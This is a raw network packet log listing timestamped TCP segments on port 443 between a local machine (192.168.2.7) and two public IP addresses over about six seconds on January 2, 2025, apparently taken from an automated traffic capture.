                                                                                              Jan 2, 2025 20:28:53.277314901 CET49807443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.277326107 CET44349807142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.277338982 CET44349807142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.277367115 CET49807443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.277439117 CET49807443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.283160925 CET49807443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.283191919 CET44349807142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.284924030 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.284962893 CET44349821142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.285033941 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.285218954 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.285233021 CET44349821142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.439764977 CET44349812142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.439812899 CET44349812142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.439898968 CET49812443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.439898968 CET49812443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.439913034 CET44349812142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.439935923 CET44349812142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.439984083 CET49812443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.441452980 CET49812443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.441467047 CET44349812142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.441891909 CET49822443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.441932917 CET44349822142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.441987991 CET49822443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.442325115 CET49822443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.442337036 CET44349822142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.773281097 CET44349815216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.773344994 CET49815443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:53.773874044 CET49815443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:53.773883104 CET44349815216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.775778055 CET49815443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:53.775784969 CET44349815216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.801424980 CET44349816216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.801482916 CET49816443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:53.801887989 CET49816443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:53.801896095 CET44349816216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.802171946 CET49816443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:53.802176952 CET44349816216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.950719118 CET44349821142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.950771093 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.954488039 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.954493046 CET44349821142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:53.956176043 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:53.956182003 CET44349821142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.044800043 CET49822443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:54.044845104 CET49815443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.044857979 CET49816443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.044883966 CET49821443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:54.050530910 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.050554037 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.050770998 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.051922083 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.051935911 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.052364111 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.052392960 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.052444935 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.053797007 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.053811073 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.689888954 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.692998886 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.693984985 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.693984985 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.693995953 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.694011927 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.702656984 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.702729940 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.703232050 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.703238964 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:54.703515053 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:54.703520060 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.072185993 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.072583914 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.072611094 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.072664976 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.072957039 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.072999954 CET44349831216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.073066950 CET49831443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.074302912 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.074309111 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.074333906 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.074352026 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.074429035 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.074430943 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.074989080 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.075006962 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.086087942 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.086272001 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.086302042 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.086500883 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.086555004 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.089297056 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.089312077 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.090398073 CET49832443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.090434074 CET44349832216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.091242075 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.091281891 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.091432095 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.091459036 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.091485023 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.091540098 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.091793060 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.091806889 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.093645096 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.093657017 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.732151031 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.732284069 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.732938051 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.734986067 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.740441084 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.741116047 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.741159916 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.741211891 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.741252899 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.741981030 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.742016077 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.742043972 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.742074966 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.742995977 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.889527082 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.889569044 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.889894962 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.890003920 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.891560078 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.891980886 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.892009020 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.892406940 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.892668009 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.893798113 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.893820047 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.894094944 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.894118071 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.894216061 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.894984007 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:55.896728992 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.896750927 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.897051096 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.897126913 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.897763014 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:55.935327053 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.935331106 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.935333014 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:55.943335056 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.204997063 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.205132008 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.205445051 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.205498934 CET44349842216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.205560923 CET49842443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.205903053 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.205935001 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.206581116 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.206880093 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.206897974 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.208096027 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.208194017 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.208208084 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.208271027 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.208328962 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.208357096 CET44349840216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.208471060 CET49840443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.208771944 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.208802938 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.208976984 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.209225893 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.209237099 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.382574081 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.382627964 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.382658958 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.382683039 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.382711887 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.382781029 CET44349841142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.382808924 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.383512020 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.383512020 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.383997917 CET49841443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.384057045 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.384089947 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.384371042 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.384371042 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.384397030 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.419682026 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.419740915 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.419769049 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.419795036 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.419821978 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.419867992 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.419891119 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.420079947 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.428354025 CET49839443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.428384066 CET44349839142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.429130077 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.429179907 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.429311037 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.429549932 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:56.429564953 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.874269009 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.874334097 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.875093937 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.875140905 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.876847982 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.876853943 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.877096891 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.877166033 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.877613068 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.879790068 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.879853964 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.880626917 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.880671978 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.882463932 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.882472038 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.882765055 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.882832050 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.883148909 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:56.923327923 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:56.923332930 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.061505079 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.061575890 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.062386990 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.062397003 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.064260006 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.064273119 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.079344034 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.079405069 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.079776049 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.079797029 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.080001116 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.080005884 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.307549000 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.307606936 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.307631016 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.307670116 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.307775021 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.307818890 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.307826042 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.307847023 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.307847023 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.307854891 CET44349850216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.307873011 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.307893991 CET49850443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.308418036 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.308456898 CET44349860216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.308532000 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.308708906 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.308722973 CET44349860216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.320775032 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.320851088 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.320941925 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.320983887 CET44349851216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.321046114 CET49851443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.321569920 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.321593046 CET44349861216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.321646929 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.321949959 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.321960926 CET44349861216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.532459021 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.532524109 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.532577991 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.532601118 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.532614946 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.532650948 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.532727003 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.533315897 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.533497095 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.533497095 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.533512115 CET44349852142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.533936977 CET49852443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.534456968 CET49868443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.534470081 CET44349868142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.534776926 CET49868443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.535238981 CET49868443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.535249949 CET44349868142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.670182943 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.670238972 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.670255899 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.670273066 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.670303106 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.670361996 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.670485020 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.671116114 CET49853443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.671130896 CET44349853142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.671703100 CET49869443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.671761036 CET44349869142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.671838045 CET49869443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.673083067 CET49869443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:57.673096895 CET44349869142.250.186.129192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.948575974 CET44349860216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.948838949 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.949228048 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.949237108 CET44349860216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.951066971 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.951072931 CET44349860216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.968919992 CET44349861216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.968985081 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.969409943 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.969420910 CET44349861216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:57.969681978 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:57.969686985 CET44349861216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.058444977 CET49868443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:58.058485985 CET49860443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.058490038 CET49869443192.168.2.7142.250.186.129
                                                                                              Jan 2, 2025 20:28:58.058525085 CET49861443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.062730074 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.062776089 CET44349870216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.063152075 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.064130068 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.064135075 CET49871443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.064145088 CET44349870216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.064184904 CET44349871216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.064618111 CET49871443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.065057993 CET49871443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.065069914 CET44349871216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.689373016 CET44349870216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.689444065 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.689939976 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.689950943 CET44349870216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.690162897 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.690169096 CET44349870216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.693110943 CET44349871216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.693195105 CET49871443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.693485975 CET49871443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.693490982 CET44349871216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:58.693631887 CET49871443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:58.693636894 CET44349871216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:59.070991039 CET44349870216.58.206.78192.168.2.7
                                                                                              Jan 2, 2025 20:28:59.071063995 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:59.071280956 CET49870443192.168.2.7216.58.206.78
                                                                                              Jan 2, 2025 20:28:59.071355104 CET44349870216.58.206.78192.168.2.7
